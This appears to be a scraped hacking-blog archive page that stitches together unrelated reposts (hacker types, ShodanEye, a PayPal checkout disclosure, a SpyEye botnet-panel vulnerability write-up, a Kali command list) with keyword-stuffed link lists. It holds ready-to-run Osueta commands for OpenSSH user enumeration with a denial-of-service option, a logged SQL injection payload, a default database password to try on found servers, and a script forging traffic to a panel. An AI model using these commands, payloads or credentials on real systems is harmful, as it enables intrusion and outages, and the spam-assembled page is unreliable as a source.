Thursday, May 21, 2020

TYPES OF HACKER

7 Types of hacker 

1-Script Kiddies-They are  just download overused software & watch youtube video on how to use it. Script kiddies don't care about hacking.

2-White Hat-They are the good guys of the hacker world. They also known as Ethical Hacker.

3-Black Hat-They finds bank or other companies with weak security and steal money or credit card information. They also known as cracker. They are dangerous because they are illegal to gain unauthorized access.

4-Gray Hat-They don't steal money or information sometimes they deface a website or they don't help people for good.

5-Green Hat-These are the hacker "noobz" but unlike Script Kiddies.They care about Hacking  and strive to become full-blown hacker.

6-Red Hat-These are the vigilantes of the hacker world. They are like White Hats in that they halt Black Hats but these folks are downright SCARY to those who have ever tried so much as penetrest.

7-Blue Hat-If a Script Kiddy took revenge he/she might become a Blue Hat.Most Blue Hats are noobz.They have no desire to learn.

Read more


  1. Wifi Hacking App
  2. Servicio Hacker
  3. Phishing Hacking
  4. Curso De Hacking Etico
  5. Hacking With Arduino
  6. Hacking Youtube
  7. Hacking Growth Sean Ellis
  8. Growth Hacking Tools
  9. Hacking 2018
  10. Wordpress Hacking
  11. Hacking Con Buscadores Pdf
  12. Que Es Hacking Etico
  13. Reddit Hacking
  14. Hacking Mifare
  15. Hacker Profesional
  16. Paginas De Hackers

RenApp: The Ultimate File Renaming App



Are you tired of managing your tens of thousands of files like jpgs, pngs, or others and you want a way to manage them as quick as possible then RenApp is solution for all problem.
RenApp lets you change names of many files of a particular type to a common name with added numbering. So no more time wasting in file management just four clicks and your files will be ordered.

Beside that RenApp can clean your folders and subfolders from backup files of .bak or .*~ extension. Removing backup files in order to make space available manually is a tedious work and can take lots of time but why do it that we've got RenApp just locate the folder and click remove it'll remove them all from that folder and its subfolders. 

Some of the features of RenApp are as:
  •    Rename files to a common name.
  •    Rename files of different extensions to a common name in one shot
  •    Remove backup files from folder and subfolders.
R  RenApp is free and Opensource, written in Python with QT interface. Check out the source code at sourceforge.


Read more

ShodanEye: Collect Infomation About All Devices Connected To The Internet With Shodan


About ShodanEye
   This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.

   Here you can read the latest article about Shodan Eye: Shodan Eye Ethical Hacking Tool Release

   The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:

   The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.
   For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here

Shodan Eye Ethical Hacking Tool Release
   Before we start the year 2020, today there is a new big release ..! Please note, if you have already installed Shodan Eye on your computer, then it is worthwhile to read it carefully. Of course, even if you don't know this Shodan tool yet:
  • Shodan Eye goes from Python 2 to Python 3
  • Save the output of the Shodan Eye results
  • The entry of the Shodan password is no longer visible.

About Shodan Search Engine
   Shoan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.

   What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Before use this tool, you should note that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal..!

ShodanEye's screenshots:

ShodanEye Installation
   If you're using GNU/Linux, open your terminal and enter these commands:

   If you're a Windows user, follow these steps to install ShodanEye:
  • Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
  • Download shodan-eye-master.zip file.>
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install shodan
    python shodan-eye.py

Video Shodan Eye on YouTube:

Contact to the author:


More articles


  1. Drupal Hacking
  2. Curso De Hacking Etico
  3. Ethical Hacking Certification
  4. Hacking Desde Cero
  5. Tecnicas De Hacking
  6. Hacker Definicion Informatica
  7. Que Significa Hat
  8. Diferencia Entre Hacker Y Cracker
  9. Hacking Netflix Account
  10. Chema Alonso Wikipedia
  11. Curso De Hacker Gratis Desde Cero
  12. Hacking Course

Hacking PayPal's Express Checkout



Do you know what is happening in the background when you buy something in an online shop using PayPal?

In this post we will tackle the following problems:
  • How can PayPal's API be tested?
  • How does PayPal's Express Checkout work? You can find the detailed report here.
  • How can we debit more money than authorized?

How PayPal's API can be tested?

PayPal's Sandbox API

PayPal offers a feature called PayPal Sandbox Accounts, which mimics the production API. The basic idea is that a normal user/shop can test the API and make transactions without actually transferring money. This is the perfect tool for developers to test their API integration.

Access to all messages

The next question is how to get access to all messages. All browser-related messages can be inspected, intercepted, and modified via BurpSuite. The main problem here is how to get access to the server-to-server exchanged messages: the messages exchanged between PayPal and a shop. In order to solve this problem, we deployed our own shop. For this purpose we used Magento, which already has a PayPal integration.
Once we have our own controlled shop, we can enforce Magento to send all request through a proxy.
In the following picture you can see our setup.

Test suite for analyzing PayPal's API [1]

In order to capture the traffic between our Magento hhop and PayPal we proceeded as follows:
  • We configured Magento to use a proxy running on localhost:8081.
  • We connected the proxy port on the virtual machine with our local machine via SSH remote port forwarding by issuing the following command
    ssh -N -R 8081: localhost :8081 <IP of Magento shop>
  • We configured BurpSuite running on our local machine to listen on Port 8081 for incoming requests.
Now, we were able to see the entire traffic.
Please note that we uses our own, custom Magento shop in order to be able to test Paypal's API.

PayPal's Express Checkout

An overview of the checkout procedure is depicted in the following:

PayPal's Express Checkout [2]




Step 1: Magento tells the PayPal API where to redirect the user after authorizing the transaction via the parameter RETURNURL and requests a token for this transaction.
Step 2: The PayPal API provides Magento with the token.
Step 3: Magento redirects the user to PayPal's website. The redirect contains the token from the previous step.
Step 4:  The user authorizes the transaction. As a result, he will be redirected back to Magento (RETURNURL) with the token.
Step 5: Magento issues a request to the PayPal API to get the transaction details.

Step 6: Magento signals the PayPal API to execute the transaction.

Step 7: Magento serves the success page.

A more detailed view of the protocol and all parameters is shown on page 16 in the full version. We will concentrate only on step 6 and the parameters relevant for the attack.

The Attack

The goal of the attack is to let a shop (in our case Magento) debit more money than authorized by the PayPal user. The core of the attack is Step 6 -- DoExpressCheckoutPayment. Let's get a deeper look at this message:

Magento can raise the authorized amount and debit more money from the user's account

  • The shop sends the token, which was issued in the first step of the protocol and identifies uniquely the transaction through all steps. 
  • The PayerID referring to the user that authorized the payment.
  • The AMT defining the amount, which will be transferred.
  • The API Credentials authenticating Magento on PayPal.
  • The Version pointing to the release number of the API.

As one can imagine, the core problem we found was the change of the AMT parameter. This value can be freely chosen by the shop, despite the fact that the user has authorized a different amount.

We tested only the SandBox API, but refused to test the production API in order to avoid problems. We promptly contacted PayPal's security team and described the problem hoping that PayPal can and will test the production API against the attack.

The response of PayPal can be summarized as follows:
  • We don't get any BugBounty since we only tested the Sanbox API. (Fair enough)
  • In the Production API PayPal this flexibility is a wanted feature. Thus, PayPal allows a merchant to charge for shipping and/or other expenses different amounts. Any malicious behavior can be detected by PayPal. In case of fraudulent charges the consumer are protected by the Buyer Protection policy.
... but the Sandbox API was nevertheless fixed.

Authors of this Post

Daniel Hirschberger
Vladislav Mladenov
Christian Mainka (@CheariX)



[1] BurpSuite Logo
[2] PayPal Express Checkout
More articles

  1. Que Es El Hacking
  2. Javascript Hacking
  3. Hacker Seguridad Informática
  4. Libros Hacking Pdf
  5. Growth Hacking Definicion

wpCrack - Wordpress Hash Cracker


Wordpress Hash Cracker.

Installation
git clone https://github.com/MrSqar-Ye/wpCrack.git


Video


Related links


Wednesday, May 20, 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


Related links


Tuesday, May 19, 2020

W3AF

"W3AF is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is currently hosted at SourceForge." read more...

Related links


  1. Libros Hacking
  2. Hacking Videos
  3. Ethical Hacking Course
  4. Hacking Wifi
  5. Hacking Etico Que Es
  6. El Mejor Hacker
  7. Hacking Wallpaper
  8. Foro Hacking
  9. Hacking Language
  10. Hacking-Lab
  11. Hacking Virus
  12. Hacking Growth Sean Ellis
  13. Hacking Academy
  14. El Hacker Pelicula

Monday, May 18, 2020

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.
Related articles

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))
        {
                $outstr = "<br>";
                set_time_limit(0);
                $filename = str_replace(" ","_",$_FILES['file']['name']);
                $ext = substr($filename, strrpos($filename, '.')+1);
                if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";
                if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";

                switch( $uptype )
                {
                case 'body': $ext = 'b'; break;
                case 'config': $ext = 'c'; break;
                case 'exe': $ext = 'e'; break;
                default: $ext = 'e';
                }
                $_SESSION['file_ext'] = $ext;
                if( isset($_POST['bots']) && trim($_POST['bots']) !== '')
              {
                        $bots = explode(' ', trim($_POST['bots']));
                        //writelog("debug.log", trim($_POST['bots']));
                      $filename .= "_".(LastFileId()+1);
                }
                if( FileExist($filename) ) $filename .= LastFileId();
                $tmpName  = $_FILES['file']['tmp_name'];
                $fileSize = $_FILES['file']['size'];
                $fileType = $_FILES['file']['type'];
                ## reading all file for calculating hash
                $fp = fopen($tmpName, 'r');
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

    SQL injection


    SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

    It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

    But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

    "For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

    And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

    CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ';

    Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

    Unfortunately the default permissions for this user is not enough to write files (select into outfile):

    Access denied for user 'frmcpviewer' (using password: YES)

    I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

    63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

    Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

    Which company/organization has the right to attack my server? 
    • police (having a warrant)
    • military (if we are at war)
    • spy agencies (always/never, choose your favorite answer)
    • CERT organisations?

    But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

    The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

    And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

    On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

    (Useless) Cross site scripting


    Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



    Session handling


    This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

    Binary server


    Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

    Log files revealed


    If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

    Reading the code


    Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

    $content = fread($fp, filesize($tmpName));
    if ( $uptype === 'config' )
        $md5 = GetCRC32($content);
    else $md5 = md5($content);
    ....
    <script>
    if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {
    alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");
    document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>";
    }
    </script>

    Decrypting SpyEye communication

    It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

    function DeCode($content)
    {
    $res = '';
    for($i = 0; $i < strlen($content); $i++)
    {
    $num = ord($content[$i]);
    if( $num != 219) $res .= chr($num^219);
    }
    return $res;
    }
    Fixed XOR key, again, well done ...
    This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


    import binascii
    import requests
    import httplib, urllib

    def xor_str(a, b):
    i = 0
    xorred = ''
    for i in range(len(a)):
    xorred += chr(ord(a[i])^b)
    return xorred

    b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+"
    payload =xor_str (binascii.a2b_base64(b64_data), 219)
    print ("the decrypted payload is: " + payload)
    params = (binascii.b2a_base64(xor_str(payload,219)))
    payload = {'data': params}
    r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload)

    Morale of the story?


    Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

    More information

    Learn A-Z Kali_Linux Commands For Beginerrs

    Iemhacker-linux-command-for-beginner

    All commands (A-Z) for Kali Linux here:
    A
    apropos Search Help manual pages (man -k)
    apt-get Search for and install software packages (Debian/Ubuntu)
    aptitude Search for and install software packages (Debian/Ubuntu)
    aspell Spell Checker
    awk Find and Replace text, database sort/validate/index
    B
    basename Strip directory and suffix from filenames
    bash GNU Bourne-Again SHell
    bc Arbitrary precision calculator language
    bg Send to background
    break Exit from a loop •
    builtin Run a shell builtin
    bzip2 Compress or decompress named file(s)
    C
    cal Display a calendar
    case Conditionally perform a command
    cat Concatenate and print (display) the content of files
    cd Change Directory
    cfdisk Partition table manipulator for Linux
    chgrp Change group ownership
    chmod Change access permissions
    chown Change file owner and group
    chroot Run a command with a different root directory
    chkconfig System services (runlevel)
    cksum Print CRC checksum and byte counts
    clear Clear terminal screen
    cmp Compare two files
    comm Compare two sorted files line by line
    command Run a command – ignoring shell functions •
    continue Resume the next iteration of a loop •
    cp Copy one or more files to another location
    cron Daemon to execute scheduled commands
    crontab Schedule a command to run at a later time
    csplit Split a file into context-determined pieces
    cut Divide a file into several parts
    D
    date Display or change the date & time
    dc Desk Calculator
    dd Convert and copy a file, write disk headers, boot records
    ddrescue Data recovery tool
    declare Declare variables and give them attributes •
    df Display free disk space
    diff Display the differences between two files
    diff3 Show differences among three files
    dig DNS lookup
    dir Briefly list directory contents
    dircolors Colour setup for `ls'
    dirname Convert a full pathname to just a path
    dirs Display list of remembered directories
    dmesg Print kernel & driver messages
    du Estimate file space usage
    E
    echo Display message on screen •
    egrep Search file(s) for lines that match an extended expression
    eject Eject removable media
    enable Enable and disable builtin shell commands •
    env Environment variables
    ethtool Ethernet card settings
    eval Evaluate several commands/arguments
    exec Execute a command
    exit Exit the shell
    expect Automate arbitrary applications accessed over a terminal
    expand Convert tabs to spaces
    export Set an environment variable
    expr Evaluate expressions
    F
    false Do nothing, unsuccessfully
    fdformat Low-level format a floppy disk
    fdisk Partition table manipulator for Linux
    fg Send job to foreground
    fgrep Search file(s) for lines that match a fixed string
    file Determine file type
    find Search for files that meet a desired criteria
    fmt Reformat paragraph text
    fold Wrap text to fit a specified width.
    for Expand words, and execute commands
    format Format disks or tapes
    free Display memory usage
    fsck File system consistency check and repair
    ftp File Transfer Protocol
    function Define Function Macros
    fuser Identify/kill the process that is accessing a file
    G
    gawk Find and Replace text within file(s)
    getopts Parse positional parameters
    grep Search file(s) for lines that match a given pattern
    groupadd Add a user security group
    groupdel Delete a group
    groupmod Modify a group
    groups Print group names a user is in
    gzip Compress or decompress named file(s)
    H
    hash Remember the full pathname of a name argument
    head Output the first part of file(s)
    help Display help for a built-in command •
    history Command History
    hostname Print or set system name
    I
    iconv Convert the character set of a file
    id Print user and group id's
    if Conditionally perform a command
    ifconfig Configure a network interface
    ifdown Stop a network interface
    ifup Start a network interface up
    import Capture an X server screen and save the image to file
    install Copy files and set attributes
    J
    jobs List active jobs •
    join Join lines on a common field
    K
    kill Stop a process from running
    killall Kill processes by name
    L
    less Display output one screen at a time
    let Perform arithmetic on shell variables •
    ln Create a symbolic link to a file
    local Create variables •
    locate Find files
    logname Print current login name
    logout Exit a login shell •
    look Display lines beginning with a given string
    lpc Line printer control program
    lpr Off line print
    lprint Print a file
    lprintd Abort a print job
    lprintq List the print queue
    lprm Remove jobs from the print queue
    ls List information about file(s)
    lsof List open files
    M
    make Recompile a group of programs
    man Help manual
    mkdir Create new folder(s)
    mkfifo Make FIFOs (named pipes)
    mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
    mknod Make block or character special files
    more Display output one screen at a time
    mount Mount a file system
    mtools Manipulate MS-DOS files
    mtr Network diagnostics (traceroute/ping)
    mv Move or rename files or directories
    mmv Mass Move and rename (files)
    N
    netstat Networking information
    nice Set the priority of a command or job
    nl Number lines and write files
    nohup Run a command immune to hangups
    notify-send Send desktop notifications
    nslookup Query Internet name servers interactively
    O
    open Open a file in its default application
    op Operator access
    P
    passwd Modify a user password
    paste Merge lines of files
    pathchk Check file name portability
    ping Test a network connection
    pkill Stop processes from running
    popd Restore the previous value of the current directory
    pr Prepare files for printing
    printcap Printer capability database
    printenv Print environment variables
    printf Format and print data •
    ps Process status
    pushd Save and then change the current directory
    pwd Print Working Directory
    Q
    quota Display disk usage and limits
    quotacheck Scan a file system for disk usage
    quotactl Set disk quotas
    R
    ram ram disk device
    rcp Copy files between two machines
    read Read a line from standard input •
    readarray Read from stdin into an array variable •
    readonly Mark variables/functions as readonly
    reboot Reboot the system
    rename Rename files
    renice Alter priority of running processes
    remsync Synchronize remote files via email
    return Exit a shell function
    rev Reverse lines of a file
    rm Remove files
    rmdir Remove folder(s)
    rsync Remote file copy (Synchronize file trees)
    S
    screen Multiplex terminal, run remote shells via ssh
    scp Secure copy (remote file copy)
    sdiff Merge two files interactively
    sed Stream Editor
    select Accept keyboard input
    seq Print numeric sequences
    set Manipulate shell variables and functions
    sftp Secure File Transfer Program
    shift Shift positional parameters
    shopt Shell Options
    shutdown Shutdown or restart linux
    sleep Delay for a specified time
    slocate Find files
    sort Sort text files
    source Run commands from a file `.'
    split Split a file into fixed-size pieces
    ssh Secure Shell client (remote login program)
    strace Trace system calls and signals
    su Substitute user identity
    sudo Execute a command as another user
    sum Print a checksum for a file
    suspend Suspend execution of this shell •
    symlink Make a new name for a file
    sync Synchronize data on disk with memory
    T
    tail Output the last part of file
    tar Tape ARchiver
    tee Redirect output to multiple files
    test Evaluate a conditional expression
    time Measure Program running time
    times User and system times
    touch Change file timestamps
    top List processes running on the system
    traceroute Trace Route to Host
    trap Run a command when a signal is set(bourne)
    tr Translate, squeeze, and/or delete characters
    true Do nothing, successfully
    tsort Topological sort
    tty Print filename of terminal on stdin
    type Describe a command •
    U
    ulimit Limit user resources •
    umask Users file creation mask
    umount Unmount a device
    unalias Remove an alias •
    uname Print system information
    unexpand Convert spaces to tabs
    uniq Uniquify files
    units Convert units from one scale to another
    unset Remove variable or function names
    unshar Unpack shell archive scripts
    until Execute commands (until error)
    uptime Show uptime
    useradd Create new user account
    userdel Delete a user account
    usermod Modify user account
    users List users currently logged in
    uuencode Encode a binary file
    uudecode Decode a file created by uuencode
    V
    v Verbosely list directory contents (`ls -l -b')
    vdir Verbosely list directory contents (`ls -l -b')
    vi Text Editor
    vmstat Report virtual memory statistics
    W
    wait Wait for a process to complete •
    watch Execute/display a program periodically
    wc Print byte, word, and line counts
    whereis Search the user's $path, man pages and source files for a program
    which Search the user's $path for a program file
    while Execute commands
    who Print all usernames currently logged in
    whoami Print the current user id and name (`id -un')
    wget Retrieve web pages or files via HTTP, HTTPS or FTP
    write Send a message to another user
    X
    xargs Execute utility, passing constructed argument list(s)
    xdg-open Open a file or URL in the user's preferred application.
    yes Print a string until interrupted
    . Run a command script in the current shell
    !! Run the last command again

    More articles


    1. Hacking Websites
    2. Hacking 2018
    3. Python Hacking
    4. Hardware Hacking Tools
    5. Hacking Cracking
    6. Ethical Hacking Certification
    7. Tipos De Hacker
    8. Libros Hacking Pdf
    9. Que Estudia Un Hacker
    10. Quiero Ser Hacker
    11. Curso De Ciberseguridad Y Hacking Ético
    12. Hacking Simulator
    13. Libro De Hacking
    14. Master Hacking Etico